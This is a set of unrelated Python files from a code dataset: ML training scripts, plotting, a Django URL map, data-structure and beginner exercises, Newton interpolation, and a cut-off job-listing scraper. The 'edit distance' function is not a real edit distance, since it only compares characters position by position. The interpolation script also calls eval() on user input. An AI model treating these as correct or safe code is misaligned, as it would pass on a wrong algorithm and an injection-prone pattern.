= A2C(sess_a2c, config_args, True)\r\n\r\n env = A2C.make_all_environments(a2c.args.num_envs, a2c.env_class, a2c.args.env_name,\r\n a2c.args.env_seed)\r\n\r\n print(\"\\n\\nBuilding the model...\")\r\n if a2c.useVAE:\r\n a2c.model.buildForVAE(env.observation_space.shape, env.action_space.n, a2c.latent_size)\r\n print(\"Model is built successfully\\n\")\r\n\r\n # with open(a2c.args.experiment_dir + a2c.args.env_name + '.pkl', 'wb') as f:\r\n # pickle.dump((env.observation_space.shape, env.action_space.n), f, pickle.HIGHEST_PROTOCOL)\r\n\r\n print('Training...')\r\n\r\n # training\r\n if a2c.args.to_train:\r\n a2c.trainer.trainFromVAE(env, sess_ae, AE)\r\n\r\n # testing\r\n with open(a2c.args.experiment_dir + a2c.args.env_name + '.pkl', 'rb') as f:\r\n observation_space_shape, action_space_n = pickle.load(f)\r\n\r\n env = a2c.make_all_environments(\r\n num_envs=1,\r\n env_class=a2c.env_class,\r\n env_name=a2c.args.env_name,\r\n seed=a2c.args.env_seed)\r\n\r\n a2c.model.buildForVAE(observation_space_shape, action_space_n, a2c.latent_size)\r\n\r\n a2c.trainer._init_model()\r\n a2c.trainer._load_model()\r\n\r\n states = a2c.trainer.model.step_policy.initial_state\r\n\r\n dones = [False for _ in range(env.num_envs)]\r\n\r\n observation_s = np.zeros(\r\n (env.num_envs, a2c.trainer.model.img_height, a2c.trainer.model.img_width,\r\n a2c.trainer.model.num_classes * a2c.trainer.model.num_stack),\r\n dtype=np.uint8)\r\n\r\n observation = env.reset()\r\n observation_s = __observation_update(observation, observation_s)\r\n\r\n i = 0\r\n max_steps = 1e3\r\n while i < max_steps:\r\n i += 1\r\n observation_z = encode_data(AE, sess_ae, observation_s)\r\n\r\n ## TODO: Change a2c.model.step_policy.step\r\n actions, values, states = a2c.model.step_policy.step(observation_z, states, dones)\r\n\r\n observation, rewards, dones, _ = env.step(actions)\r\n\r\n for n, done in enumerate(dones):\r\n if done:\r\n observation_s[n] *= 0\r\n # print(file_name, i, len(observation_list), max_steps, end='\\r')\r\n # print(batch_num, len(observation_list), max_steps)\r\n\r\n # print()\r\n env.render()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"load_AE.py","file_name":"load_AE.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515965450","text":"#Copia descarada del código de Jaime. Ejercicio 29.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef grafica(datafile, plotfile, plotlabel):\n data = np.loadtxt(datafile)\n \n \n plt.figure(figsize=(25,4))\n \n plt.subplot(1,3,1)\n s = np.shape(data)\n print(s)\n n_x = s[1]\n n_t = s[0]\n plt.imshow(data, extent = [-1,1,1,0], aspect=2.0)\n plt.colorbar(label=\"$Tension$\")\n plt.xlabel(\"Posicion\")\n plt.ylabel(\"Tiempo\")\n plt.title(plotlabel+str(n_t))\n\n\n plt.subplot(1,3,2)\n x = np.linspace(0,1,n_x)\n delta_t = 0.1/n_t\n for i in range(n_t):\n if i%(n_t//9) == 0:\n plt.plot(x, data[i,:], label=\"t={:.02f}\".format(i*delta_t))\n plt.legend(loc=1)\n plt.xlabel(\"Posicion\")\n plt.ylabel(\"$Tension$\")\n \n plt.subplot(1,3,3)\n t = np.linspace(0,0.1,n_t)\n plt.plot(t, data[:,n_x//4], alpha=i/n_t, color='black')\n plt.xlabel(\"Tiempo\")\n plt.ylabel(\"$T$(x=0)\")\n\n plt.savefig(plotfile, bbox_inches='tight')\n\ngrafica(\"evolve_30_450.dat\", \"evolve_A.png\", \"$N_x=101$ , $N_{tc}=$\")\n","sub_path":"graficar.py","file_name":"graficar.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"404938067","text":"from __main__ import *\n\nlatex = 1\nmaxproc = 3\n# readpath = ''\n# writepath = ''\nframepath = '/Users/ljprust/data/framedump/'\n# simname = ''\noutprefix = 'star.out.'\nnframes = 1\nframeskip = 1\nstartingset = 1\nperiod = 200\ndo_marks = 0\ndo_snapshot = 0\ndataset = 1\npartskip = 1\n# dPeriod = 3.4e14\nnref = 4\nuseIE = 1\ntimelabel = 'day'\n# FULL PARALLEL\ndo_fullparallel = 0\n# ENERCOMP\ndo_enercomp = 0\nener_low = 1.0e19\nener_high = 1.0e24\nbernlim = 0.5e22\n# BERNOULLI\ndo_bernoulli = 0\n# bern_limit = 1.0e21\n# bern_plotwidth = 4.0e13\nbernslice = 0.1\n# ENERGIES\ndo_energies = 0\n# ORBEL\ndo_orbel = 0\n# CORETEMP\ndo_coretemp = 0\n# RADPROF\nplot_mesa = 0\n# mesadata = 'profile17.data'\ncorecorrect = 0\ndo_radprof = 0\nradprof_fixaxes = 0\n# radprof_axes = [6.0e8, 3.0e11, 3.0e-2, 30.0]\nplot_cutoff = 0\n# cutoffRho = 0.0009398664788462718\n# TEMPPROF\ndo_tempprof = 0\ntempprof_fixaxes = 0\n# tempprof_axes = [1.0e9, 1.0e12, 1.0e4, 4.0e7]\n# ENTROPY\ndo_entropy = 0\nentprof_fixaxes = 0\n# entprof_axes = [1.0e10, 1.0e15, 1.0e-16, 1.0e-9]\n# DENSANIM\ndo_densanim = 0\ndensanim_direction = 'x'\n# densanim_plotwidth = 3.0e11\ndensanim_fixlimits = 0\n# densanim_lowlim = 6.0e10\n# densanim_highlim = 6.0e11\n# PARTSLICEANIM\ndo_partslice = 0\npartslice_direction = 'x'\npartslice_parttype = 'H'\n# partslice_plotwidth = 3.0e11\npartslice_fixlimits = 0\n# partslice_lowlim = 1.0e19\n# partslice_highlim = 1.0e24\n# VELPART\ndo_velpart = 0\nvelpart_fixlimits = 0\n# velpart_lowlim = 1.0e9\n# velpart_highlim = 1.0e13\n# velpart_plotwidth = 4.0e13\n# COMPARISON\ndo_comparison = 0\n# comparison_name = ''\nnplots = 1\nnrows = 1\nncolumns = 1\nreadpath1 = ''\nreadpath2 = ''\nreadpath3 = ''\nreadpath4 = ''\nreadpath5 = ''\nreadpath6 = ''\nreadpath7 = ''\nreadpath8 = ''\ntitle1 = ''\ntitle2 = ''\ntitle3 = ''\ntitle4 = ''\ntitle5 = ''\ntitle6 = ''\ntitle7 = ''\ntitle8 = ''\n\ngamma = 5.0/3.0\nG = 6.674e-8\nR = 8.314e7 / G\nRsun = 7.0e10\nMsun = 2.0e33\nk = 1.381e-16 / G\nh = 6.626e-27 / math.sqrt(G)\nmpart = 1.6606e-24\n","sub_path":"template_config.py","file_name":"template_config.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427448307","text":"from docx import Document\r\nimport xlrd\r\nimport sys\r\n\r\ndef process_excel(excel_file, doc_file):\r\n\r\n document = Document()\r\n\r\n workbook = xlrd.open_workbook(excel_file)\r\n headings = None\r\n\r\n sheet = workbook.sheet_by_index(0)\r\n for row in sheet.get_rows():\r\n\r\n if headings == None:\r\n headings = [x.value.strip() for x in row]\r\n else :\r\n table = document.add_table(rows=len(headings), cols=2)\r\n table.columns[0].width=2000000\r\n table.columns[1].width=4000000\r\n table.allow_autofit=True\r\n table.style='Table Grid'\r\n \r\n for j, col in enumerate(headings):\r\n cell = table.cell(j, 0)\r\n cell.text = col\r\n cell = table.cell(j, 1)\r\n cell.text = row[j].value\r\n \r\n bolding_columns = [0]\r\n for row in list(range(len(headings))):\r\n for column in bolding_columns:\r\n table.rows[row].cells[column].paragraphs[0].runs[0].font.bold = True\r\n\r\n document.save(doc_file)\r\n \r\nExcelFile=sys.argv[1]\r\nprocess_excel(ExcelFile, ExcelFile[:-4]+'docx')\r\n","sub_path":"Excel to Word.py","file_name":"Excel to Word.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90902300","text":"'''\r\nThis problem was asked by Google.\r\nThe edit distance between two strings refers to the minimum number of character insertions, deletions, and substitutions required to change one string to the other.\r\nFor example, the edit distance between \"kitten\" and \"sitting\" is three: substitute the \"k\" for \"s\", substitute the \"e\" for \"i\", and append a \"g\".\r\nGiven two strings, compute the edit distance between them.\r\n'''\r\n\r\n#________________________________________________________________\r\n\r\ndef edit_dist(string1, string2):\r\n edit_distance = 0\r\n\r\n edit_distance += abs(len(string2) - len(string1))\r\n for i in range(min(len(string1), len(string2))):\r\n if string1[i] != string2[i]: edit_distance += 1\r\n\r\n return edit_distance\r\n\r\nprint(edit_dist(input(), input()))\r\n","sub_path":"Problem 031.py","file_name":"Problem 031.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"639134451","text":"# coding: utf-8\n\nfrom __future__ import print_function\nimport csv\nimport sys\nimport math\nimport myfunc\nimport MinLinearFit\nimport Tkinter\nimport tkMessageBox\n\nerr_message = \"Error: Invalid value\\nThis program will be terminated.\"\nheader = [\"#\"]\nncsvfile, csvflist, tgtfname = myfunc.csvfcount()\nncol, nrow = myfunc.matrixsize(csvflist)\n\nprint(\"\\n- Input -\")\nprint(\"Choose the extraction range.\")\nXst = input(\"Starting X: \")\nYst = input(\"Starting Y: \")\nXen = input(\"Ending X: \")\nYen = input(\"Ending Y: \")\n\nprint(\"\")\ndistance = input(\"Distance of surrounding points: \")\nif distance < 1 or distance >= ncol or type(distance) != int:\n print(err_message)\n sys.exit()\n\n# Masking\nmsk_st = ncsvfile/3\nmsk_en = ncsvfile*2/3\nprint(\"Masking range is from %d to %d.\\n\"%(msk_st, msk_en))\ndX_dn, dY_dn = MinLinearFit.main(ncsvfile, csvflist, tgtfname, msk_st, msk_en)[:2]\n\n# Difinition of extraction range in the moving coordinate sys.\nif dX_dn > 0:\n Xmin = math.ceil(Xst + dX_dn * ncsvfile)\n Xmax = Xen\n print(\"dX/dn = %d > 0, Xmin = %d in moving coord. sys.\"%(dX_dn,Xmin))\nelif dX_dn < 0:\n Xmin = Xst\n Xmax = math.floor(Xen + dX_dn * ncsvfile)\n print(\"dX/dn = %d < 0, Xmax = %d in moving coord. sys.\"%(dX_dn,Xmax))\nelse:\n Xmin = Xst\n Xmax = Xen\n\nif dY_dn > 0:\n Ymin = Yst\n Ymax = math.floor(Yen - dY_dn * ncsvfile)\n print(\"dY/dn > 0, Ymax = %d\"%Ymax)\nelif dY_dn < 0:\n Ymin = math.ceil(Yst - dY_dn * ncsvfile)\n Ymax = Yen\n print(\"dY/dn < 0, Ymin = %d\"%Ymin)\nelse:\n Ymin = Yst\n Ymax = Yen\n\nprint(\"\\n- Extraction & Output -\")\nXmov = []\nYmov = []\nk = 0\nl = 0\nwhile Xst+k*distance <= Xen:\n Xmov.append(Xst+k*distance) # X coordinate in moving coordinate system.\n k += 1\nwhile Yst+l*distance <= Yen:\n Ymov.append(Yst+l*distance) # Y coordinate in moving coordinate system.\n l += 1\n\noutfname = myfunc.filenaming(\"PixData/Moving_partial_%s_dst=%d.csv\"%(tgtfname, distance))\n\nwith open(outfname, \"ab\") as outfile:\n writer = csv.writer(outfile)\n\n # Header row is output.\n cpYmov = list(Ymov)\n for Yh in cpYmov:\n cpXmov = list(Xmov)\n for Xh in Xmov:\n header.append(\"%d_%d\"%(Xh,Yh))\n writer.writerow(header)\n\n # Data is output per a row (in static sys.)\n i = 0\n while i < ncsvfile:\n print(\"Extracting %d of %d data...\"%(i+1, ncsvfile), end=\"\\r\")\n\n # Creation of no. column.\n row = [i+1]\n cpYmov = list(Ymov)\n for Y in cpYmov:\n cpXmov = list(Xmov)\n for X in cpXmov:\n row.append(myfunc.extraction(csvflist[i], int(round(X-dX_dn*i)), int(round(Y-dY_dn*i)), 1))\n\n writer.writerow(row)\n i += 1\n\nprint(\" \", end=\"\\r\") # Terminal text is elased.\nprint(\"Data writing has finished.\")\n\nprint(\"\\n- Result -\")\nTkinter.Tk().withdraw()\ntkMessageBox.showinfo(\"PixData_GridPoint_MinLinearFit_range.py\", \"The Program has finished!\")\nprint(\"The program has finished!\")\n","sub_path":"PixData_cls.py","file_name":"PixData_cls.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"278681765","text":"cena=0\ni=1\nwhile i <=5:\n cena+=int(input(\"cena artikla \"))\n i+=1\nprint(\"Vsota: \",cena)\n\nst_artiklov=int(input(\"Število izdelklov: \"))\n\ncena=0\nj=0\nwhile j=-100:\n stanje=float(input(\"Sprememba \"))\n print(\"stanje \", stanje)\nprint(\"bankrot\")\n\n# anonimni potrošniki\nstvari=0\nskupaj=0\nen_izdelek=1\nwhile stvari<10 and skupaj<100 and en_izdelek!=0:\n en_izdelek=int(input(\"cena artikla \"))\n skupaj+=en_izdelek\n if en_izdelek!=0:\n stvari+=1\nprint(\"Porabili ste {0}€ za {1} stvari\".format(skupaj,stvari))\n","sub_path":"vaja/za_izpit(2.vaje).py","file_name":"za_izpit(2.vaje).py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"530046739","text":"# 单向循环链表\n\n\nclass CircularLinkedList(object):\n class __Node:\n\n def __init__(self, item, next=None):\n self.item = item\n self.next = next\n\n def __init__(self):\n self._head = None\n\n def is_empty(self):\n return self._head is None\n\n def add(self, item):\n node = CircularLinkedList.__Node(item, None)\n if self.is_empty():\n # 如果是添加第一个节点,不需要遍历尾节点(循环链接:将尾节点的next指向头节点)\n self._head = node\n node.next = self._head\n else:\n # 添加的节点的next指向原来的head节点\n node.next = self._head\n # 遍历链表,找到尾节点,将其next指向新的head节点\n curr = self._head\n while curr.next != self._head:\n curr = curr.next\n curr.next = node\n # 更新head节点为新节点\n self._head = node\n\n def size(self):\n return len(self)\n\n def __len__(self):\n count = 0\n for _ in self:\n count += 1\n return count\n\n def remove(self, item):\n curr = self._head\n prev = None\n # 增加截止条件,否则会死循环\n while curr.item != item and curr.next != self._head:\n prev = curr\n curr = curr.next\n\n if prev is None:\n self._head = curr.next\n else:\n prev.next = curr.next\n\n def clear(self):\n self._head = None\n\n def __iter__(self):\n \"\"\"\n 使LinkedList对象可以被迭代\n :return:\n \"\"\"\n curr = self._head\n if curr is None:\n return\n # 会少循环一次,所以在循环外补偿一次\n while curr.next != self._head:\n item = curr.item\n curr = curr.next\n yield item\n yield curr.item\n\n\n# 测试逻辑\nlst = CircularLinkedList()\n\nlst.add(1)\nlst.add(2)\n\n# 2\nprint(lst.size())\n\nlst.add(3)\n\n# False 3\nprint(lst.is_empty(), lst.size())\n\n# -> 3\n# -> 2\n# -> 1\nfor i in lst:\n print('->', i)\n\nlst.remove(2)\n\n# 2\nprint(lst.size())\n\nlst.clear()\n\n# True 0\nprint(lst.is_empty(), lst.size())\n","sub_path":"linear/_circular_linked_list.py","file_name":"_circular_linked_list.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"609243859","text":"from django.urls import re_path, path\nfrom . import views\n\nurlpatterns = [\n re_path(r'^$', views.index, name='index'),\n path('write/', views.create_post, name='create_post'),\n re_path(r'^(?P[a-zA-Z0-9ㄱ-힣]+)/$',\n views.post_list,\n name='post_list'),\n re_path(r'^(?P[a-zA-Z0-9ㄱ-힣]+)/(?P[1-9][0-9]*)/$',\n views.post_detail,\n name='post_detail'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"524505494","text":"'''\nYou are given a string and width . \nYour task is to wrap the string into a paragraph of width .\n\nInput Format\n\nThe first line contains a string, . \nThe second line contains the width, .\n\nConstraints\n\nOutput Format\n\nPrint the text wrapped paragraph.\n\nSample Input 0\n\nABCDEFGHIJKLIMNOQRSTUVWXYZ\n4\n\nSample Output 0\nABCD\nEFGH\nIJKL\nIMNO\nQRST\nUVWX\nYZ\n'''\n\n\nimport textwrap\n\ndef wrap(string, max_width):\n chunk, chunk_size = len(string), max_width\n string_list = [string[i:i+chunk_size] for i in range(0, chunk, chunk_size)]\n final_string = ''\n for i in string_list:\n final_string = final_string + i + '\\n'\n return final_string\n\nif __name__ == '__main__':\n string, max_width = input(), int(input())\n result = wrap(string, max_width)\n print(result)\n \n","sub_path":"Text Wrap.py","file_name":"Text Wrap.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"567752156","text":"# Copyright 2018 Dong-Hyun Lee, Kakao Brain.\n# (Strongly inspired by original Google BERT code and Hugging Face's code)\n\n\"\"\" Pretrain transformer with Masked LM and Sentence Classification \"\"\"\n\nfrom random import randint, shuffle\nfrom random import random as rand\nimport fire\nimport json\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom tensorboardX import SummaryWriter\n\nimport models\nimport optim\nimport train\n\nfrom utils import set_seeds, get_device, get_random_word, truncate_tokens_pair\n\n# Input file format :\n# 1. One sentence per line. These should ideally be actual sentences,\n# not entire paragraphs or arbitrary spans of text. (Because we use\n# the sentence boundaries for the \"next sentence prediction\" task).\n# 2. Blank lines between documents. Document boundaries are needed\n# so that the \"next sentence prediction\" task doesn't span between documents.\n\ndef seek_random_offset(f, back_margin=2000):\n \"\"\" seek random offset of file pointer \"\"\"\n f.seek(0, 2)\n # we remain some amount of text to read\n max_offset = f.tell() - back_margin\n f.seek(randint(0, max_offset), 0)\n f.readline() # throw away an incomplete sentence\n\n\nclass SentPairDataLoader():\n \"\"\" Load sentence pair (sequential or random order) from corpus \"\"\"\n def __init__(self, train_file, test_file, batch_size, max_len, short_sampling_prob=0.1, pipeline=[]):\n super().__init__()\n self.train_data = json.load(open(train_file, \"r\"))\n self.test_data = json.load(open(test_file,\"r\"))\n self.sentences = [example['sentence'] for example in self.train_data]\n self.sentences.extend([example['sentence'] for example in self.test_data])\n self.one_epoch_step = len(self.sentences) // batch_size +1\n\n self.data_index = 0\n\n print(\"Number of seqs is {}, one_epoch_steps is {}\".format(len(self.sentences),self.one_epoch_step))\n\n if not os.path.exists('LM_data.txt'):\n with open(\"./LM_data.txt\",\"w\",encoding=\"utf-8\") as f:\n for seq in self.sentences:\n f.write(seq+\"\\n\")\n \n self.f_pos = open(\"./LM_data.txt\",\"r\", encoding=\"utf-8\")\n\n self.vocabulary = []\n for seq in self.sentences:\n self.vocabulary.extend(seq.split())\n self.vocabulary = list(set(self.vocabulary))\n\n self.word_to_id = {}\n\n self.word_tot = 0\n self.word_to_id['[PAD]'] = self.word_tot\n self.word_tot += 1\n for i in range(len(self.vocabulary)):\n self.word_to_id[self.vocabulary[i]] = self.word_tot\n self.word_tot +=1\n \n self.word_to_id['[UNK]'] = self.word_tot\n self.word_to_id['[BLANK]'] = self.word_tot +1\n self.word_to_id['[MASK]'] = self.word_tot +2\n self.word_to_id['[SEP]'] = self.word_tot +3\n self.word_to_id['[CLS]'] = self.word_tot +4\n\n self.vocabulary.append('[UNK]')\n self.vocabulary.append('[BLANK]')\n self.vocabulary.append('[MASK]')\n self.vocabulary.append('[SEP]')\n self.vocabulary.append('[CLS]')\n self.word_tot += 5\n\n print(\"Total {} words\".format(self.word_tot))\n print(\"UNK id is {}\".format(self.word_to_id['[UNK]']))\n print(\"CLS id is {}\".format(self.word_to_id['[CLS]']))\n\n\n\n #self.f_pos = open(file, \"r\", encoding='utf-8', errors='ignore') # for a positive sample\n #self.f_neg = open(file, \"r\", encoding='utf-8', errors='ignore') # for a negative (random) sample\n #self.tokenize = tokenize # tokenize function\n self.max_len = max_len # maximum length of tokens\n self.short_sampling_prob = short_sampling_prob\n self.pipeline = pipeline\n self.batch_size = batch_size\n \n def indexer(self, x):\n x_ids = []\n for word in x:\n if word in self.vocabulary:\n x_ids.append(self.word_to_id[word])\n else:\n x_ids.append(self.word_to_id['[UNK]'])\n return x_ids\n\n def read_tokens(self, f, length, discard_last_and_restart=True):\n \"\"\" Read tokens from file pointer with limited length \"\"\"\n tokens = []\n while len(tokens) < length:\n line = f.readline()\n if not line: # end of file\n return None\n if not line.strip(): # blank line (delimiter of documents)\n if discard_last_and_restart:\n tokens = [] # throw all and restart\n continue\n else:\n return tokens # return last tokens in the document\n #tokens.extend(self.tokenize(line.strip()))\n tokens.extend(line.strip().split())\n return tokens\n\n def __iter__(self): # iterator to load data\n while True:\n batch = []\n for i in range(self.batch_size):\n # sampling length of each tokens_a and tokens_b\n # sometimes sample a short sentence to match between train and test sequences\n '''\n len_tokens = randint(1, int(self.max_len / 2)) \\\n if rand() < self.short_sampling_prob \\\n else int(self.max_len / 2)\n '''\n len_tokens = self.max_len\n\n is_next = rand() < 0.5 # whether token_b is next to token_a or not\n\n #tokens_a = self.read_tokens(self.f_pos, len_tokens, True)\n tokens_a = []\n while len(tokens_a) < self.max_len:\n tokens_a.extend(self.sentences[self.data_index % len(self.sentences)].strip().split())\n self.data_index += 1\n\n #seek_random_offset(self.f_neg)\n # = self.f_pos if is_next else self.f_neg\n #tokens_b = self.read_tokens(f_next, len_tokens, False)\n \n if tokens_a is None: # end of file\n self.f_pos.seek(0, 0) # reset file pointer\n return\n\n instance = (is_next, tokens_a)\n for proc in self.pipeline:\n instance = proc(instance, self.vocabulary, self.indexer)\n\n batch.append(instance)\n\n # To Tensor\n batch_tensors = [torch.tensor(x, dtype=torch.long) for x in zip(*batch)]\n #batch_tensors = [ x for x in zip(*batch)]\n yield batch_tensors\n #yield batch\n\n\nclass Pipeline():\n \"\"\" Pre-process Pipeline Class : callable \"\"\"\n def __init__(self):\n super().__init__()\n\n def __call__(self, instance):\n raise NotImplementedError\n\n\nclass Preprocess4Pretrain(Pipeline):\n \"\"\" Pre-processing steps for pretraining transformer \"\"\"\n def __init__(self, max_pred, mask_prob, max_len=512):\n super().__init__()\n self.max_pred = max_pred # max tokens of prediction\n self.mask_prob = mask_prob # masking probability\n self.vocab_words = None # vocabulary (sub)words\n self.indexer = None # function from token to token index\n self.max_len = max_len\n\n def __call__(self, instance, vocab, indexer):\n self.vocab_words = vocab\n self.indexer = indexer\n\n is_next, tokens_a = instance\n\n # -3 for special tokens [CLS], [SEP], [SEP]\n #truncate_tokens_pair(tokens_a, tokens_b, self.max_len - 3)\n\n # Add Special Tokens\n tokens = ['[CLS]'] + tokens_a\n tokens = tokens[:self.max_len]\n #segment_ids = [0]*(len(tokens_a)+2) + [1]*(len(tokens_b)+1)\n input_mask = [1]*len(tokens)\n\n # For masked Language Models\n masked_tokens, masked_pos = [], []\n # the number of prediction is sometimes less than max_pred when sequence is short\n n_pred = min(self.max_pred, max(1, int(round(len(tokens)*self.mask_prob))))\n # candidate positions of masked tokens\n cand_pos = [i for i, token in enumerate(tokens)\n if token != '[CLS]' and token != '[SEP]']\n shuffle(cand_pos)\n for pos in cand_pos[:n_pred]:\n masked_tokens.append(tokens[pos])\n masked_pos.append(pos)\n if rand() < 0.8: # 80%\n tokens[pos] = '[MASK]'\n elif rand() < 0.5: # 10%\n tokens[pos] = get_random_word(self.vocab_words)\n # when n_pred < max_pred, we only calculate loss within n_pred\n masked_weights = [1]*len(masked_tokens)\n\n # Token Indexing\n #print(tokens)\n input_ids = self.indexer(tokens)\n masked_ids = self.indexer(masked_tokens)\n #print(masked_ids)\n\n # Zero Padding\n n_pad = self.max_len - len(input_ids)\n input_ids.extend([0]*n_pad)\n #print(input_ids)\n #segment_ids.extend([0]*n_pad)\n input_mask.extend([0]*n_pad)\n\n # Zero Padding for masked target\n if self.max_pred > n_pred:\n n_pad = self.max_pred - n_pred\n masked_ids.extend([0]*n_pad)\n masked_pos.extend([0]*n_pad)\n masked_weights.extend([0]*n_pad)\n\n #return (input_ids, segment_ids, input_mask, masked_ids, masked_pos, masked_weights, is_next)\n return (input_ids, input_mask, masked_ids, masked_pos, masked_weights, is_next)\n\n\nclass BertModel4Pretrain(nn.Module):\n \"Bert Model for Pretrain : Masked LM and next sentence classification\"\n def __init__(self, cfg, word_tot):\n super().__init__()\n self.transformer = models.Transformer(cfg, word_tot)\n self.fc = nn.Linear(cfg.dim, cfg.dim)\n self.activ1 = nn.Tanh()\n self.linear = nn.Linear(cfg.dim, cfg.dim)\n self.activ2 = models.gelu\n self.norm = models.LayerNorm(cfg)\n self.classifier = nn.Linear(cfg.dim, 2)\n # decoder is shared with embedding layer\n embed_weight = self.transformer.embed.tok_embed.weight\n n_vocab, n_dim = embed_weight.size()\n self.decoder = nn.Linear(n_dim, n_vocab, bias=False)\n self.decoder.weight = embed_weight\n self.decoder_bias = nn.Parameter(torch.zeros(n_vocab))\n\n def forward(self, input_ids, input_mask, masked_pos):\n h = self.transformer(input_ids, input_mask)\n pooled_h = self.fc(h[:, 0])\n masked_pos = masked_pos[:, :, None].expand(-1, -1, h.size(-1))\n h_masked = torch.gather(h, 1, masked_pos)\n h_masked = self.norm(self.activ2(self.linear(h_masked)))\n logits_lm = self.decoder(h_masked) + self.decoder_bias\n #logits_clsf = self.classifier(pooled_h)\n\n return logits_lm\n\n\ndef main(train_cfg='config/pretrain.json',\n model_cfg='config/bert_base.json',\n data_file='../tbc/books_large_all.txt',\n model_file=None,\n data_parallel=True,\n vocab='../uncased_L-12_H-768_A-12/vocab.txt',\n save_dir='./LM',\n log_dir='./LM',\n max_len=512,\n max_pred=20,\n mask_prob=0.15):\n\n cfg = train.Config.from_json(train_cfg)\n model_cfg = models.Config.from_json(model_cfg)\n max_len = model_cfg.max_len\n\n set_seeds(cfg.seed)\n\n dataset_dir = os.path.join('./data', 'nyt')\n train_file = os.path.join(dataset_dir, 'train.json')\n test_file = os.path.join(dataset_dir, 'test.json')\n\n pipeline = [Preprocess4Pretrain(max_pred,\n mask_prob,\n # list(tokenizer.vocab.keys()),\n # tokenizer.convert_tokens_to_ids,\n max_len)]\n\n print(\"Pipeline Over\")\n\n data_iter = SentPairDataLoader(train_file,\n test_file,\n cfg.batch_size,\n max_len,\n pipeline=pipeline)\n\n print(\"Data_iter Over\")\n\n model = BertModel4Pretrain(model_cfg,data_iter.word_tot)\n criterion1 = nn.CrossEntropyLoss(reduction='none')\n criterion2 = nn.CrossEntropyLoss()\n\n optimizer = optim.optim4GPU(cfg, model, data_iter.one_epoch_step * cfg.n_epochs)\n trainer = train.Trainer(cfg, model, data_iter, None, optimizer, save_dir, get_device())\n\n writer = SummaryWriter(log_dir=log_dir) # for tensorboardX\n\n def get_loss(model, batch, global_step): # make sure loss is tensor\n #input_ids, segment_ids, input_mask, masked_ids, masked_pos, masked_weights, is_next = batch\n input_ids, input_mask, masked_ids, masked_pos, masked_weights, is_next = batch\n\n #logits_lm, logits_clsf = model(input_ids, segment_ids, input_mask, masked_pos)\n logits_lm = model(input_ids, input_mask, masked_pos)\n loss_lm = criterion1(logits_lm.transpose(1, 2), masked_ids) # for masked LM\n loss_lm = (loss_lm*masked_weights.float()).mean()\n #loss_clsf = criterion2(logits_clsf, is_next) # for sentence classification\n writer.add_scalars('data/scalar_group',\n {'loss_lm': loss_lm.item(),\n #'loss_clsf': loss_clsf.item(),\n #'loss_total': (loss_lm + loss_clsf).item(),\n 'lr': optimizer.get_lr()[0],\n },\n global_step)\n #return loss_lm + loss_clsf\n return loss_lm\n print(\"Start training\")\n for cur_epoch in range(cfg.n_epochs):\n trainer.train(get_loss, model_file, None, data_parallel)\n print(\"{} epoch is Done\".format(cur_epoch))\n\n\nif __name__ == '__main__':\n fire.Fire(main)\n","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":13415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463120639","text":"xs = eval(input(\"Ingrese los x: \"))\nys = eval(input(\"Ingrese los y: \"))\n\np = []\nb = []\n\nresult = str(ys[0])\nb.append(ys[0]) \np.append(eval(\"lambda x: \"+result))\nb.append((ys[1]-b[0])/(xs[1]-xs[0]))\nresult += f\"+{b[1]}*(x-{xs[0]})\"\np.append(eval(\"lambda x: \"+result))\n\nfor n in range(2,len(ys)):\n fun = p[n-1]\n den = 1\n coef = \"\"\n for i in xs[:n]:\n den *= (xs[n]-i)\n coef += f\"(x-{i})*\"\n coef = coef[:len(coef)-1]\n b.append((ys[n] - fun(xs[n]))/den)\n result += f\"+{b[n]}*{coef}\"\n p.append(eval(\"lambda x: \"+result))\n\nprint(\"Interpolante Newton (sin diferencias divididas)\")\nprint()\nprint(\"Resultados:\")\nprint()\nprint(\"Coeficientes del polinomio:\")\nprint()\nfor i in b:\n print(i)\nprint()\nprint(\"Polinomio:\")\nprint()\nprint(result) \n\n","sub_path":"analisis_numerico/simple_scripts/interpolanteNewton.py","file_name":"interpolanteNewton.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"634954202","text":"import requests\r\nimport math\r\n\r\n\r\nclass jobinfo(object):\r\n def __init__(self, jobname, city):\r\n self.jobname = jobname\r\n self.city = city\r\n self.lurl = \"http://www.lagou.com/jobs/positionAjax.json?city=%s&needAddtionalResult=false\" % self.city\r\n self.headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\"}\r\n\r\n def get_pn(self):\r\n pn = 1\r\n post_data = {\r\n \"first\": \"false\",\r\n \"pn\": str(pn),\r\n \"kd\": self.jobname\r\n }\r\n fjson = 